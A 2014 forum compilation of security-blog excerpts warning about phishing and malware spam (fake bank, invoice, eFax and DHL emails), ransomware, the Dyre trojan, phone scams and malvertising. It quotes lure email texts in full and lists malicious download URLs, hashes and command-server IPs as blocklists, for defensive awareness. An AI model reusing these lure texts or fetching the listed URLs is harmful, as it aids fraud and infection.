Sep 5, 2014 - "There’s a NatWest phish in circulation which tries to scare recipients with warnings of logins from multiple cities which it claims is forbidden. Anybody spending a lot of time on the road for work or personal reasons could potentially be panicked into clicking the links in this one. The URL in the mail leads to a 404 error on a website about different types of paint, so it’s likely been reported and / or pulled by the hosts but here’s the text so you can easily spot it the next time it gets rolled out with a fresh URL:

Dear Customer,
During a recent review of your account we found that you are currently logging in from different cities in a suspicious manner that is not compliant with our bank policies.
NatWest customers are not permitted to log in from different places at same time, or using proxies.
For your safety, we have temporarily deactivated your account, to reactive your account please go to our SSL secure link below and update your account credentials.
However, please note that our squad reserves the right to close your account at any time. As such, we encourage you to become familiar with our program policies and monitor your network accordingly.

The email displays the full URL in the text of the legitimate NatWest website, but uses the old trick of making the clickable link take them to a -phish- hosted on a -compromised- website... it’s always a good idea to hover over any clickable link in an email so you can check the final destination... with so many people traveling as part of their job nowadays this could easily snag a few victims."
___

Cryptographic Locker
- http://www.webroot.com/blog/2014/09/05/cryptographic-locker/
Sep 5, 2014 - "... every few weeks we see a -new- encrypting ransomware variant. It’s not surprising either since the business model of ransoming files for money is tried and true. Whether it’s important work documents, treasured wedding pictures, or complete discographies of your favorite artists, everyone has valuable data they don’t want taken. This is the last thing anyone wants to see:
> https://www.webroot.com/blog/wp-content/uploads/2014/09/background-cropped.png
This variant does bring some new features to the scene, but also fails at other lessons learnt by previous variants. Starting with the new features this variant will now just “delete” the files after encrypting them (it just hides them from you). This doesn’t add any more intangibility since they are encrypted with AES-128 anyway, but it does add a greater sense of loss and panic since all of your common data directories will appear to have been cleaned out. Another new feature is the constant raise in price every 24 hours. While price bumping was used on previous variants, this one doesn’t have a limit... this variant falls short on overall volatility is in the failure to delete the VSS (Volume Shadow Service) so using tools like Shadow Explorer* will work to retrieve your files and circumvent paying the ransom. As I’ve said in previous blogs I do expect issues like this to be fixed once this malware is adopted by more botnets for widespread distribution..."
* http://www.shadowexplorer.com/

:fear: :mad:

FYI...

Fake BH Live Tickets SPAM - (bhlive .co.uk / bhlivetickets .co.uk)
- http://blog.dynamoo.com/2014/09/bh-live-tickets-peter-pan-spam.html
8 Sep 2014 - "... very large quantity of these spam emails, purporting to be from:
From: bhlivetickets@ bhlive .co.uk
Date: 8 September 2014 08:43
Subject: Confirmation of Order Number 484914
ORDER CONFIRMATION
Order Number Order Date
484914 07-09-2014 13:00
YOUR E-TICKET(S) ARE ATTACHED TO THIS EMAIL, SENT TO [redacted]. Please print ALL PAGES of the PDF file attached to the email and bring them with you to gain admission to the event...

These emails are -not- from BH Live Tickets and their systems have not been compromised in any way. Instead, these emails are a forgery with an attachment (tickets.3130599.zip or similar) which in turn contains a malicious executable (in this case tickets.332091.exe). The VirusTotal detection rate for this malware is just 3/55*. Comodo CAMAS reports** that this downloads an additional component from tiptrans .com .tr/333 which has a VirusTotal detection rate of 4/51***. According to ThreatExpert****, this second component POSTs some information to 80.94.160.129:8080 (OVH, France) and also appears to contact 92.222.46.165 (National Academy Of Sciences Of Belarus).
Recommended blocklist:
tiptrans .com .tr
92.222.46.165
80.94.160.129"
* https://www.virustotal.com/en-gb/file/7a3a9360cd4dae87981e9e56a988e149223266512ebd468f7c59aacda2c1bfe3/analysis/1410162673/

** http://camas.comodo.com/cgi-bin/submit?file=7a3a9360cd4dae87981e9e56a988e149223266512ebd468f7c59aacda2c1bfe3

*** https://www.virustotal.com/en-gb/file/41de66fb7dc00dd5fe19e2fa6247af3b30b2ed3a80eadc1cc4410ea8b227ef47/analysis/1410163490/

**** http://www.threatexpert.com/report.aspx?md5=992acfe50852f1287394a991645aec4b

- http://myonlinesecurity.co.uk/confirmation-order-number-fake-pdf-malware/
8 Sep 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/bhlive_ticketsd.png

> https://www.virustotal.com/en-gb/file/72caf25189d16d81915d78c494cf5b7c93f45b254cb25e31526f7b5b546a9e83/analysis/1410164460/
___

Fake RBS "Important Docs" SPAM - again ...
- http://blog.dynamoo.com/2014/09/rbs-importat-docs-spam.html
8 Sep 2014 - "The Royal Bank of Scotland has been spoofed several times recently, this latest fake spam contains a payload that looks like it might be Cryptowall.
Date: Mon, 8 Sep 2014 15:00:22 +0100 [10:00:22 EDT]
From: Vicente Mcneill [Vicente@rbs .co.uk]
Subject: Important Docs
Please review attached documents regarding your account.
Tel: 01322 929655
Fax: 01322 499190
email: Vicente@ rbs .co.uk ...

Attached is an archive RBS_Account_Documents.zip containing a malicious executable RBS_Account_Documents.scr which has a detection rate at VirusTotal of 4/53*... analysis shows that it attempts to download components from the following locations:
95.141.37.158/0809uk1/NODE01/0/51-SP3/0/
95.141.37.158/0809uk1/NODE01/1/0/0/
95.141.37.158/0809uk1/NODE01/41/5/4/
bullethood.com/ProfilePics/0809uk1.zip
95.141.37.158 is SeFlow.it Internet Services, Italy. bullethood .com is on a shared server at GoDaddy. The malware also appears to be attempting to connect to 94.23.250.88 (OVH, France).
Recommended blocklist:
bullethood .com
95.141.37.158
94.23.250.88"
* https://www.virustotal.com/en-gb/file/f9046c5fbdddee04dd8fbf6e187a630b88a961243b20933afcb0e36091847d59/analysis/1410183105/
___

Cryptowall ransomware ...
- http://arstechnica.com/security/2014/09/ransomware-going-strong-despite-takedown-of-gameover-zeus/
Sept 7 2014 - "... Within a week of the takedown of Gameover Zeus and Cryptolocker, a surge of spam with links to a Cryptolocker copycat, known as Cryptowall, resulted in a jump in ransomware infections, states a report released last week by security-services firm Dell Secureworks*. Cryptowall first appeared in November 2013, and spread slowly, but the group behind the program were ready to take advantage of the vacuum left by the downfall of its predecessor. Being prepared paid off: In six months, the Cryptowall group infected nearly 625,000 systems, and even though only 0.27% of victims paid, the group still made $1.1 million, according to data from a command-and-control server discovered by Dell Secureworks..."
* http://www.secureworks.com/cyber-threat-intelligence/threats/cryptowall-ransomware/
___

‘Dyre’ malware goes after Salesforce users
- https://blog.malwarebytes.org/cyber-crime/2014/09/dyre-malware-goes-after-salesforce-users/
Sep 8, 2014 - "San Francisco-based company Salesforce well-known for its cloud-based Customer Relationship Management (CRM) software, emailed a security advisory to its customers, late Friday.
Copy of the email sent by Salesforce:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/salesforce_email.png
The threat known as Dyre was originally spotted by security firm CSIS* and by PhishMe** which also had uncovered the new malware earlier in June. Back then, the threat was aimed at banks and other financial institutions, something very reminiscent of other banking Trojans such as Zeus and its variants. But researchers discovered that the malware is now capable of capturing login credentials from Salesforce users by -redirecting- them through a phishing website. Dyre will initially infect users through some form of social-engineering, typically with an email that contains a malicious attachment. Once on the system, the malware can act as a man-in-the-middle and intercept every single keystroke. To be clear, this is not a vulnerability with Salesforce or its website, but rather a type of malware that leverages compromised end-point machines... This type of attack could be mean there might be a new trend on the horizon, one that goes after Software as a Service (SaaS) users. Businesses increasingly rely on third-party software providers for their needs because it can be a cheaper option without all the headaches of doing it yourself. For example, instead of managing their own email server, companies will use Office365 or similar cloud-based email solutions. Banking credentials are still the bread-and-butter for the majority of cyber-crooks because they can be immediately used. But the data harvested from many SaaS applications also holds a tremendous value for those willing to invest the time to dig in and find bits of information that could lead to a large compromise in a top-tier business. There is no silver bullet to defend against these threats but once again a healthy balance of end-user education about phishing scams and proper end-point security solutions will go a long way. Data exfiltration is one the most important issues of 2014 with a growing number of businesses being affected. The effects on companies’ brands and trust of their customers can be very damaging and long lasting, not to mention the potential lawsuits that often follow.:
* https://www.csis.dk/en/csis/news/4262/

** http://phishme.com/project-dyre-new-rat-slurps-bank-credentials-bypasses-ssl/
___

Fake "PAYMENT SLIP" SPAM - with an encrypted .7z archive
- http://blog.dynamoo.com/2014/09/payment-slip-spam-comes-with-encrypted.html
8 Sep 2014 - "This spam comes with a malicious attachment:
From: daniel mo [danielweiche002@ gmail .com]
Subject: PAYMENT SLIP
Signed by: gmail .com
Thanks for your last message,
We remitted 30% prepayment today amounting to 51,300USD against your invoice INV332831 as was agreed with you by our purchasing agent. Please check the attached invoice and the payment slip and correspond your account information. You will receive payment in your account after a few days.
Please confirm the receipt below,
kindly use this password {121212} to view attachment for our payment slip;
Thanks,
Daniel
Accounts Assistant
67752222
64472801
Zenia Singapore Pte Ltd

In order to deal with the attachment new order.7z, you'll need something capable of dealing with .7z files (e.g. 7-Zip). Inside the archive is a malicious executable new order.scr which has a VirusTotal detection rate of 5/54*. I have not been able to analyse the malware any further than this."
* https://www.virustotal.com/en-gb/file/b1277d881f6504e668eabdaaced21f66618b2a0cd25ad94fc1e1b1a31806f363/analysis/1410186462/
___

RBC Royal Bank Phish - and PDF malware
- http://myonlinesecurity.co.uk/received-new-secure-message-rbc-royal-bank-customer-service-phishing/
8 Sep 2014 - "'You have received a new secure message from RBC Royal Bank Customer Service' pretending to come from RBC Royal Bank Customer Service <securemessage@ rbc .com> is an attempt to -scam- you and get your bank log on details. It also is trying to infect you and is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email is particularly devious, evil and crafty as it sends you to a site that at first glance you think is a phishing site (if you are unwise enough to click any of the links in the email). However that site also has a hidden iframe that tries to download some malware to the computer if you have a vulnerable version of Java. Then if that isn’t enough when you fill in the log in details on the page the buttons on the page appear to link to the genuine RBC bank site so hovering over the links will fool you into thinking that you are on the genuine RBC site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/rbc.png
... then the sign in button leads you to this webpage where any of the links or the buttons download what appears to be a genuine PDF file that looks blank. That file is a malformed PDF with a script virus embedded that will infect you. This file 09.08.14report.pdf has a current VirusTotal detection rate of 5/55*. These emails contain a genuine PDF file that is malformed and contains a script virus and can infect you with no action on your part by simply previewing the PDF in your browser or in the PDF reader..."
* https://www.virustotal.com/en/file/8c966250202f464973929a31886b6ba8d4454425f9348000833091f9d9e8c59a/analysis/1410199439/

- http://threattrack.tumblr.com/post/96988594103/rbc-royal-bank
Sep 8, 2014 - "Subjects Seen:
You have received a new secure message from RBC Royal Bank Customer Service
Typical e-mail details:
You have received a secure message
This is an automated message sent by Royal Bank Secure Messaging Server.
The link above will only be active until: 09/10/2014
Please click here or follow this link : royalbank.com/cgi-bin/rbaccess/rbcgi3m01
Help is available 24 hours a day by email at secure.emailhelp @rbcroyalbank.com
If you have concerns about the validity of this message, please contact the sender directly. For questions about Royal Bank’s e-mail encryption service, please contact technical support at 1-800-769-2511.
First time users - will need to register before reading the Secure Message.

Malicious URLs:
halilbekrek .com/TUTOS/libs/excel/install6.exe
66.235.98.169/rbc.com/webapp/ukv0/signin/logon.php
66.235.98.169/rbc.com/webapp/ukv0/signin/report/09.08.14report.pdf
84.45.53.45/rbc.com/webapp/ukv0/signin/logon.php
84.45.53.45/rbc.com/webapp/ukv0/signin/message.html
84.45.53.45/rbc.com/webapp/ukv0/signin/report/09.08.14report.pdf

Malicious File Name and MD5:
install6.exe (e3fbc7b3bf11f09c5ee33b1e1b45f81b)
09.08.14report.pdf (ecddafa699814679552d2bf95fc087e5)
OfigGigg.dat (85d42ccc12301bbda27abf4c0b7eb7ff)

66.235.98.169: https://www.virustotal.com/en/ip-address/66.235.98.169/information/

84.45.53.45: https://www.virustotal.com/en/ip-address/84.45.53.45/information/

Tagged: RBC, Vawtrak, CVE-2013-2729
___

Fake Tcn Invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/tcn-invoice-n265588248042e-fake-pdf-malware/
8 Sep 2014 - "'Tcn Invoice # N265588248042E' pretending to come from Katharine Norwood <Katharine.Norwood@ advanced-ornamentation .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Good morning...
I requested an invoice yesterday; on the invoice it shows a charge of $585.15 although on my credit card statement it shows a charge of $185.13. Can you please advise on what the total should be and if it is for the amount of $185.13 can you please provide an invoice with that amount.
Thank you.
Katharine Norwood
Administrative Assistant
San Diego, CA 92135
205 840-2913

8 September 2014: Invoice.zip ( 48 kb) : Extracts to Invoice.pdf.scr
Current Virus total detections: 4/55*. This 'Tcn Invoice # N265588248042E' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/52c344196cf767035c404995bb4237677540b2f17e815c4d5433f7b35ffa4d4d/analysis/1410198304/
___

Twitter Phish SPAM: “Strange Rumors About You”
- https://blog.malwarebytes.org/fraud-scam/2014/09/twitter-phishing-spamrun-strange-rumors-about-you/
Sep 8, 2014 - "... an ongoing Twitter spam attack which is sending potential victims to phishing pages via a Tumblr -redirect- . Compromised Twitter accounts and / or bots are sending variations of the below to Twitter users:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/twitterspam1.jpg
We’ve seen some 200+ messages sent in the last ten minutes, and this attack has been ongoing for at least six hours. Here’s the Tumblr -spam- blog which is redirecting to the fake Twitter login, and the -fake- login itself:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/twitterspam2.jpg
...
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/twitterspam3.jpg
The -fake- page reads:
“Your current session has ended.
For security purposes your [sic] were forcibly signed out. You need to verify your Twitter account, please relogin.”
Twitter users should -avoid- signing into Twitter via any of the links being sent around, and always check the URL to ensure they’re entering their credentials in the right place."

211.154.136.106: https://www.virustotal.com/en/ip-address/211.154.136.106/information/

:fear: :mad:

FYI...

Fake Bill.com Invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/bill-com-invoice-paid-fake-pdf-malware/
9 Sep 2014 - "'Bill.com Invoice has been paid' pretending to come from The Bill .com Team <notificationonly@ hq.bill .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[ Bill .com image ]
Hi,
Thank you for payment to Bill.com. The credit/debit card you have on file with us was successfully charged $115.33 for the billing period 08/01/14-09/01/14.
The Statement for this account is now available for viewing. Please find it attached to this email.
Have questions? Sign in at our website, then contact support.
Thank you,
The Bill .com Team
Please do not respond to this email. This e-mail was sent from a notification-only e-mail address.

9 September 2014: bill-d59f78596bfa79e01898cf9d0e645b99328028d597e9005146787f09435a01016270d6ffc5d69ec27901.zip ( 486 kb):
Extracts to BILL_ID_895634523945258345873645763459879876432985763298563253245.pdf.exe Current Virus total detections: 28/55*. This Bill .com Invoice has been paid is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e3c2b761ce6a188e9669480d52368f3e865499a06813d939c23ad915d49cba62/analysis/1410252379/
____

“Google dorking“ ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/google-dorking-waking-up-web-admins-everywhere/
Sep 9, 2014 - "Last July, the US Department of Homeland Security warned of a new kind of criminal attack: “Google dorking“*. This refers to asking Google for things they have found via special search operators... Google finds things online using a program that accesses web sites: the Google web crawler, called the Googlebot. When the Googlebot examines the web and finds “secret” data, it adds it to Google’s database just like any other kind of information... suppose your company’s HR representative left a spreadsheet with -confidential- employee data -online- . Since it’s open for everyone to access, the crawler sees and indexes it. From them on, even though it might have been hard to find before, a simple – or not so simple – Google search will point any attacker to it. Google never stored the actual data (unless it was cached), it just made it easier to find. This kind of “attack” has been around for as long as search engines have been around. There are whole books devoted to the subject of “Google dorking”, which is more commonly known as “Google hacking”. Books have been published about it for years, and even the NSA has a 643-page manual that describes in detail how to use Google’s search operators to find information. The warning – as ridiculous as it might seem – has some merit... finding information that has been carelessly left out in the open is not strictly criminal: at the end of the day, it was out there for Googlebot to find. Google can’t be blamed for finding what has been left public; it’s the job of web admins to know what is and isn’t on their servers wide open for the world to see. It’s not just confidential documents that are open to the public, either. As we noted as far back in 2013, industrial control systems could be found via Google searches. Even more worryingly, embedded web servers (such as those used in web cameras) are found online all the time with the Shodan search engine. This latter threat was first documented in 2011, which means that IT administrators have had three years to shut down these servers, but it’s still a problem to this day. In short: this problem has been around for a while, but given that it’s still around an official warning from the DHS is a useful reminder to web admins everywhere: perform “Google dorking” against your own servers frequently, looking for things that shouldn’t be there. If you don’t, somebody else will and their intentions might not be so pure..."
* https://publicintelligence.net/feds-google-dorking/
___

Fake Sage Outdated Invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/sage-outdated-invoice-fake-pdf-malware/
9 Sep 2014 - "'Outdated Invoice' pretending to come from Sage Account & Payroll <invoice@ sage .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[Sage logo image ]
Sage Account & Payroll
You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link bellow or click here to view/download your account invoice:
... Account?432532=Invoice_090914.zip
If we hold any information about you which is incorrect or if there are any changes to your details please let us know by so that we can keep our records accurate and up to date. If you would like to update your records or see a copy of the information that we hold about you, you can contact us at Data Protection Officer, Sage (UK) Ltd, North Park, Newcastle-upon-Tyne, NE13 9AA or by email to digital@sage.com. If you request a copy of your information you will need to pay a statutory fee which is currently £10.
The contents of this email and any attachments are confidential...

9 September 2014: invoice_090914.zip ( 18kb) : Extracts to invoice_090914.scr
Current Virus total detections: 4/55* . This 'Outdated Invoice' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e7b04220bc9c21161ba5f6aac8cd7bc2c7951aa80fc68b2d196cb9da7a78dc8d/analysis/1410267601/

- http://blog.dynamoo.com/2014/09/sage-outdated-invoice-spam.html
9 Sep 2014
"Recommended blocklist:
95.141.37.158 ..."
(More detail at the dynamoo URL above.)

95.141.37.158: https://www.virustotal.com/en/ip-address/95.141.37.158/information/
___

Fake NatWest Invoice SPAM - PDF malware
- http://myonlinesecurity.co.uk/important-new-account-invoice-fake-pdf-malware/
9 Sep 2014 - "'Important – New account invoice' pretending to come from NatWest Invoice <invoice@ natwest .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[NatWest logo image]
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here or follow the link below...

9 September 2014: invoice_090914.zip ( 18kb) : Extracts to invoice_090914.scr
Current Virus total detections: 4/55* . This 'Important – New account invoice' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e7b04220bc9c21161ba5f6aac8cd7bc2c7951aa80fc68b2d196cb9da7a78dc8d/analysis/1410267601/
___

Fake Worker’s Compensation SPAM – word.doc malware
- http://myonlinesecurity.co.uk/hmcts-workers-compensation-appeal-fake-word-doc-malware/
9 Sep 2014 - "'HMC&TS Worker’s Compensation Appeal' pretending to come from HM Courts and Tribunals Service <submit.wjq@ courtsni .gov.uk>is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... So far today I have seen several subjects for this email:
HMC&TS Worker’s Compensation Appeal
Worker’s Compensation Summons
HM Courts & Tribunals Service Summons
HM Courts & Tribunals Service
All the emails are very similar, but will have different courts or tribunals listed and different dates, case numbers and tribunal members. The faked sender will always be the same name as the recipient of the email with a few random letters after the name... Email reads:
Worker’s Compensation Appeal Tribunal
Decision # 502
Board Direction To Rehear Decision #695
Claim No.: 2504=5704
Date of Original Notice of Appeal: June 10, 2014
Date Received at The Tribunal: June 19, 2014
Date of Board Direction to Rehear: August 11, 2014
Received: August 20, 2014
Date of Documentary Review by Appeal Committee: August 23, 2014
Date of Decision: September 6, 2014
To Whom It May Concern,
Your Corporation (named Respondent)
Appears to be in default because of its failure to comply with the Administrative Law Judge’s Prehearing Order without decent cause, and such default by Respondent constitutes an admission of all facts alleged in the Complaint and a waiver of Respondent’s right to contest such factual allegations. Respondent violated the section 9(6), paragraph B13(1) of the Jobseekers Act 1995.
We recommend you to download a copy of original Complaint at Tribunal in attachment below...

9 September 2014: Copy68789.zip (66kb): Extracts to Copy of original Complaint at Tribunal.docx.exe
Current Virus total detections: 1/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft word .doc instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c765b5ba935a3c872388185940ca89570a1710e89148ce25caf1a54148079800/analysis/1410269102/

- http://threattrack.tumblr.com/post/97055148048/hm-courts-tribunals-service-spam
Sep 9, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4cb469a9e44e608eacef08eba6109111/tumblr_inline_nbmytoLcAX1r6pupn.png

Malicious File Name and MD5:
Copy4855.zip (854ADF297E8B1D79BA0E744F90AFDE50)
Copy of original Complaint at Tribunal.docx.exe (6D9BDE90B81C064ACA5ED994BC8A981A)

Tagged: HM Courts & Tribunals, Kuluoz
___

Hacks throw 25 malware variants at Apple Mac OS X
- http://www.theinquirer.net/inquirer/news/2363995/hackers-throw-25-malware-variants-at-apple-mac-os-x
Sep 9 2014 - "... 25 varieties of malware, some of which are being used in targeted attacks, warns security firm F-Secure. F-Secure reported uncovering the malware variants in its Threat Report H1 2014*, claiming it discovered the first 20 attack tools earlier this year..."
* http://www.f-secure.com/weblog/archives/00002741.html
Sep 8, 2014

:mad: :fear:

FYI...

Fake DHL invoice SPAM
- http://blog.dynamoo.com/2014/09/geir-myklebust-dhl-no.html
10 Sep 2014 - "Geir Myklebust is a real employee for DHL in Norway, but neither he nor DHL are responsible for this spam run in any way (their systems have NOT been breached either). Instead, it contains a malicious attachment and it should simply be deleted.
From: Geir Myklebust (DHL NO) [Geir.Myklebust@ dhl .com]
Date: 10 September 2014 10:35
Subject: FW: customer acct. no.: 4690086 - invoice 0257241 needs to be paid
Dear Sir.
The attached invoice from Villmarksmessen 2014 has still not been settled.
Please advise as soon as possible.
Thank you and regards,
Geir
Med vennlig hilsen/ Kind Regards
Geir Myklebust
Product Manager, Avd. Trade Fairs & Events
DHL Global Forwarding (Norway) AS
Avd. Trade Fairs & Events
Messeveien 14
2004 Lillestrøm ...

Attached is a ZIP file of various different names (e.g. invoice_0257241.zip), containing a malicious executable file invoice_3466198.exe which has a VirusTotal detection rate of 3/54*. The Comodo CAMAS report** shows an attempted connection to voladora .com/Imagenes/qaws.cab which is currently coming up with a socket error. I would recommend that you block access to that domain. Further analysis is pending..."
* https://www.virustotal.com/en-gb/file/779955dd6a5da605f2432449bf1edc35e356a251cf43f3cbfda704a26cac5038/analysis/1410342283/

** http://camas.comodo.com/cgi-bin/submit?file=779955dd6a5da605f2432449bf1edc35e356a251cf43f3cbfda704a26cac5038

"UPDATE: a second malicious binary is doing the round, this time with a detection rate of 2/53***..."
*** https://www.virustotal.com/en-gb/file/febd053fdafbc097eedbacac3e0f97d912f7925ddab0dfc90a32895dac35fbdd/analysis/1410353017/

92.43.17.6: https://www.virustotal.com/en/ip-address/92.43.17.6/information/

- http://myonlinesecurity.co.uk/fw-customer-acct-186588-invoice-9782264-needs-paid-fake-pdf-malware/
10 Sep 2014
- https://www.virustotal.com/en/file/febd053fdafbc097eedbacac3e0f97d912f7925ddab0dfc90a32895dac35fbdd/analysis/1410350810/
___

Fake Overdue invoice SPAM – doc malware
- http://myonlinesecurity.co.uk/overdue-invoice-1197419584-fake-doc-malware/
10 Sep 2014 - "'Overdue invoice #1197419584' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Good afternoon,
I was hoping to hear from you by now. May I have payment on invoice #1197419584 today please, or would you like a further extension?
Best regards,
Cherish Schaunaman
+07540 61 15 69
... or like this one:
This email contains an invoice file in attachment.

10 September 2014 : bill_2014-09-10_09-16-23_1197419584.arj :
Extracts to: bill_2014-09-10_09-16-23_1197419584.exe
Current Virus total detections: 6/55*
Alternative version 10 September 2014 : Invoice4777_2C7.zip :
Extracts to: attachment_scaned.doc .exe
Current Virus total detections: 2/54**
This 'Overdue invoice #1197419584' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft word.doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4c6d8f5ad6ff6f35be8b2fe921fc65619ba5708b5a0597a6929fd3bc3f36aabb/analysis/1410342531/

** https://www.virustotal.com/en/file/877eab31951bb48139f0ec592ce906ff3891a74f078af494eeb8ccbc9d913b52/analysis/1410341816/
___

'Outstanding Warrant' Phone SCAMS
- http://www.hoax-slayer.com/outstanding-warrant-phone-scams.shtml
Sep 10, 2014 - "Scammers posing as law-enforcement officers are cold-calling people and tricking them into paying over the phone to resolve supposedly outstanding warrants. The scammers warn victims that, if they don't pay the requested fee, police may come to their home and arrest them... The scammers are reportedly quite skilled at impersonating police officers and are often able to convince victims that they are legitimate. When victims call back on the number provided, the scammers may identify their 'office' as a seemingly legitimate entity such as the 'County Warrants Department'. This simple -ruse- may further convince victims that the scammer's claims are true... This type of -scam- is certainly nothing new and has been around in various forms for many years... a flurry of reports from several US states suggests that these scammers are currently quite active. The scammers are also using variations of the old jury duty phone scam to steal money from victims. Police will -never- call you and demand an immediate payment to resolve an outstanding warrant. If you receive such a suspect call, do -not- give the caller any personal and financial information and do -not- comply with their instructions. If in doubt, call your local police to check. Do -not- use a phone number provided by the caller. Find a number for police in a local phone directory..."
___

Malvertisements - YouTube, Amazon and Yahoo
- http://www.computerworld.com/article/2604303/malicious-advertising-hits-amazon-youtube-and-yahoo.html
Sep 9, 2014 - "Malicious advertisements have popped up on websites such as YouTube, Amazon and Yahoo, part of a sophisticated campaign to spread malware, Cisco said*... When encountered, the malicious advertisements cause the user to be -redirected- to a different website, which triggers a download based on whether the computer is running Windows or Apple's OS X... Cisco didn't identify the advertising network that is serving the malicious advertisements. Although ad networks try to filter out malicious ones, occasionally bad ones slip in, which for a high-traffic site means a large pool of potential victims... Some of the malicious ads were served on youtube.com, amazon.com and ads.yahoo.com, Pelkmann wrote. All told, 74 domains were serving the ads. When a victim is -redirected- by one of the ads, the computer downloads a piece of malware with a unique checksum, making it harder for security software to detect. The download may also contain legitimate software such as a media player. To be infected, the user must be convinced to open the file. 'The attackers are purely relying on social engineering techniques in order to get the user to install the software package,' Pelkmann wrote. 'No drive-by exploits are being used thus far'..."
* http://blogs.cisco.com/security/kyle-and-stan/

:fear: :mad:

FYI...

Fake job offer SPAM - llcinc .net
- http://blog.dynamoo.com/2014/09/llc-inc-llcincnet-fake-job-offer.html
11 Sep 2014 - "This -fake- company's name looks like it has been designed to be hard to find on Google. The so-called LLC INC using the domain llcinc .net does -not- exist.
Date: Wed, 10 Sep 2014 19:51:50 -0400 [09/10/14 19:51:50 EDT]
From: LLC INC
Reply-To: recruiter@ llcinc .net
Subject: EMPLOYMENT OFFER
Hello,
Good day to you overthere we will like to inform you that our company is currently
opening an opportunity for employment if you are interested please do reply with your resume
to recruiter@ llcinc .net
Thanks
Management LLC INC

This so-called job is going to be something like a money mule, parcel mule or some other illegal activity. The domain llcinc .net was registered just a few days ago with -fake- details... There is no website. The email originates from 209.169.222.37, the mail headers indicate that this is probably a compromised email server mail .swsymphony .org.
Avoid."
___

Fake eFax SPAM leads to Cryptowall
- http://blog.dynamoo.com/2014/09/efax-spam-leads-to-cryptowall.html
11 Sep 2014 - "Yet another -fake- eFax spam. I mean really I cannot remember the last time someone sent me a (real) fax...
From: eFax [message@ inbound .efax .com]
Date: 11 September 2014 20:35
Subject: eFax message from "unknown" - 1 page(s), Caller-ID: 1-865-537-8935
Fax Message [Caller-ID: 1-865-537-8935
You have received a 1 page fax at Fri, 12 Sep 2014 02:35:44 +0700.
* The reference number for this fax is atl_did1-1400166434-52051792384-154.
Click here to view this fax using your PDF reader.
Please visit www .eFax .com/en/efax/twa/page/help if you have any questions regarding this message or your service.
Thank you for using the eFax service! ...

... the link in the message goes somewhere bad, in this case it downloads a ZIP files from cybercity-game .com/game/Documents.zip which unzips to a malicious executable Documents.scr which has a pretty low VirusTotal detection rate of 2/55*. The ThreatTrack report** clearly identifies this as Cryptowall and identifies that it either downloads data from or posts data... The 111.exe has a much wider detection rate of 22/53*** and according the the ThreatTrack analysis of that binary there is some sort of network connection... I would recommend blocking the following:
188.165.204.210
193.19.184.20
193.169.86.151
goodbookideas .com
mtsvp .com
suspendedwar .com "
* https://www.virustotal.com/en-gb/file/687c7d8030b9f15bd2ef857116ef8c0c6fe83aa998ff32dab406beb0d4e759c2/analysis/1410467960/

** http://www.dynamoo.com/files/analysis_2567_79b1f47c0dfd99f974d2920a381ad91f.pdf

*** https://www.virustotal.com/en-gb/file/5db8207e1891b01b84c987f8065c2f646cbcceae9ff5af5198a05f75766e8c39/analysis/1410468901/
___

Malicious WordPress injection sending to 178.62.254.78 and 176.58.100.98
- http://blog.dynamoo.com/2014/09/malicious-wordpress-injection-sending.html
11 Seo 2014 - "There is currently some sort of injection attack against WordPress sites that is injected code into the site's .js files. Not so unusual.. except that the payload site in the file changes every half hour or so... The site mentioned in the IFRAME is the one that keeps -changing- so presumably there is either something running on the compromised WordPress site, or there is some other mechanism for the bad guys to update the details... All these subdomains are hijacked from legitimate domains using AFRAID.ORG nameservers, and are hosted on 178.62.254.78 (Digital Ocean, Netherlands). These then pass the victim onto another domain in the format... blocking the following IPs may give you better protection:
176.58.100.98
178.62.254.78 "

176.58.100.98: https://www.virustotal.com/en-gb/ip-address/176.58.100.98/information/

